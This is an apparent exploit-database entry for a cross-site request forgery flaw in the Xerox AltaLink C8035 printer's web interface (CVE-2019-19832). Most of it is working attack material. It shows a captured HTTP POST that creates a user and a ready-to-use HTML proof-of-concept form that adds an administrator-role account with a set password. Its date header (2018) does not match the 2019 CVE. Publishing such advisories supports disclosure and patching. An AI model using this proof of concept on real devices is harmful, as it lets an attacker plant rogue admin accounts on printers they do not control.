Share
# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)  
# Date: 2018-12-17   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://www.xerox.com/  
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series  
# Software : Xerox Printer  
# Product Version: AltaLink C8035  
# Vulernability Type : Cross-Site Request Forgery (Add Admin)  
# Vulenrability : Cross-Site Request Forgery  
# CVE : CVE-2019-19832  
  
# Description :  
  
The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.  
A request to add users is made in the Device User Database form field. This request is captured by  
the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request  
to add users is made in the Device User Database form field to the xerox.set URI.   
(The frmUserName value must have a unique name.)  
  
  
# HTTP POST Request :  
  
POST /dummypost/xerox.set HTTP/1.1  
Host: 158.162.130.37  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 707  
Origin: https://158.162.130.37  
Connection: close  
Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10  
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp  
Upgrade-Insecure-Requests: 1  
  
NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10  
  
# CSRF PoC HTML :  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://158.162.130.37/dummypost/xerox.set" method="POST">  
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />  
<input type="hidden" name="isRoles" value="True" />  
<input type="hidden" name="isPassword" value="True" />  
<input type="hidden" name="isCreate" value="True" />  
<input type="hidden" name="rolesStr" value="6,1,2" />  
<input type="hidden" name="limited" value="0" />  
<input type="hidden" name="oid" value="0" />  
<input type="hidden" name="minLength" value="1" />  
<input type="hidden" name="maxLength" value="63" />  
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />  
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />  
<input type="hidden" name="isNumberRequired" value="" />  
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />  
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />  
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />  
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />  
<input type="hidden" name="frmUserName" value="ismailtasdelen" />  
<input type="hidden" name="frmNewPassword" value="Test1234!" />  
<input type="hidden" name="frmRetypePassword" value="Test1234!" />  
<input type="hidden" name="frmOldPassword" value="undefined" />  
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>